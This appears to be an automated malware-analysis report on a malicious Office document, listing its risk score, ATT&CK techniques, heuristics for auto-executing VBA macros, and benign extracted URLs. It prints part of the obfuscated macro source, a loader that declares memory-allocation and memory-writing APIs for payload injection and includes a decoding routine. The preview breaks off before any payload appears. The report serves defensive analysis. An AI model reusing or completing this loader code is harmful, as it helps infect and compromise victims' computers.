MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros with an auto-execute function (Document_Open) that uses Shell to execute commands. This indicates the macro is designed to run arbitrary code, likely to download and execute a secondary payload. The specific functions called (e.g., ZwWriteVirtualMemory, NtAllocateVirtualMemory) suggest memory manipulation, often used for payload injection or evasion.
Heuristics 3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8650 bytes |
SHA-256: 14d28837f0e4a3d2c0ac383d204c3a9767920d655983cbca0e84b807a68d7f2c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "antiphonary" #If 4 + 1 > 3 And Win64 > 1 - 1 Then Public Declare PtrSafe Function megaloblastic Lib "Kernel32" Alias "CreateTimerQueueTimer" (circumfluent As Any, ByVal cloyingly As Any, ByVal awakening As Any, ByVal fula As Any, ByVal consciousness As Any, ByVal redrimmed As Any, ByVal ovate As Any) As Long Public Declare PtrSafe Function meanderingly Lib "Ntdll.dll " Alias _ "ZwWriteVirtualMemory" (ByVal guinde As Any, ByVal atticus As Any, ByVal drypis As Any, ByVal anergy As Any, ByVal segnity As Any) As LongPtr Public Declare PtrSafe Function androgenic Lib "ntdll.dll" Alias "NtDeleteAtom" (twentyfourth As LongPtr) Public Declare PtrSafe Function causeless Lib "ntdll.dll" Alias "NtContinue" (amerge As LongPtr,deceleration As LongPtr,subject As LongPtr) As LongPtr Public Declare PtrSafe Function exculpate Lib "ntdll.dll " Alias "NtAllocateVirtualMemory" (anthoceropsida As LongPtr, charinile As LongPtr, ByVal tenet As LongPtr,equivocateByVal As LongPtr, interloper As LongPtr, ByVal below As LongPtr) As LongPtr Public Declare PtrSafe Function lc Lib "Kernel32.dll" Alias "CreateEventW" (ByVal arguable As LongPtr,chamaeleontidae As LongPtr,altorivievo As LongPtr,appressed As LongPtr,hemiplegic As LongPtr) As Long Public Declare PtrSafe Function ingratitude Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (hyla As LongPtr, anarhichas As Any,coquillage As LongPtr, beanball As Any) As Boolean Public Declare PtrSafe Function woodfrog Lib "Shlwapi.dll" Alias "PathFileExists" (redet As LongPtr) As LongPtr #Else Public Declare Function megaloblastic Lib "Kernel32" Alias "CreateTimerQueueTimer" (antisemite As Any, ByVal clubroom As Any, ByVal bib As Any, ByVal largehearted As Any, ByVal galoche As Any, ByVal cowbarn As Any, ByVal crossstitch As Any) As Long Public Declare Function shipowner Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (barbital As Long, lombard As Any, hatpin As Long, neomys As Any) As Boolean Public Declare Function nebulously Lib "Shlwapi.dll" Alias "PathFileExists" (nicaraguan As Long) As Long Public Declare Function exculpate Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (anacyclus As Long, scatological As Long, ByVal ble As Long, asbestosisByVal As Long, unthrifty As Long, ByVal semidiameter As Long) As Long Public Declare Function saprolegnia Lib "ntdll.dll" Alias "NtContinue" (chamaedaphne As Long, anaphasic As Long, faroese As Long) As Long Public Declare Function phasmida Lib "Kernel32.dll" Alias "CreateEventW" (ByVal boutez As Long, ow As Long, dorp As Long, doesn As Long, genera As Long) As Long Public Declare Function brickyard Lib "ntdll.dll" Alias "NtDeleteAtom" (maintopsail As Long) Public Declare Function meanderingly Lib "Ntdll.dll " Alias _ "ZwWriteVirtualMemory" (ByVal steeped As Any, ByVal anticyclone As Any, ByVal defenselessness As Any, ByVal chivalry As Any, ByVal nightstop As Any) As Long #End If Function shyness() Dim micomicon(255) As Byte interferometer = 42 - 112 + 135 Do micomicon(interferometer) = interferometer - 65 interferometer = interferometer + 1 Loop While interferometer <= 91 interferometer = 48 Do micomicon(interferometer) = interferometer + 4 interferometer = interferometer + 1 Loop While interferometer <= 58 interferometer = 97 Do micomicon(interferometer) = interferometer - 71 interferometer = interferometer + 1 Loop While interferometer <= 123 micomicon(47) = 63 interferometer = 43 micomicon(interferometer) = 62 shyness = micomicon End Function Function aceldama(thickskull) As String mussuk = guar + 75 guar = Math.Round(138) Dim adaptive(6962) As Byte Dim colonized As Long Dim extra As Integer Dim rights As String Dim aris(63) As Long absento = Rnd(313) Dim unmeant As Long Dim ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.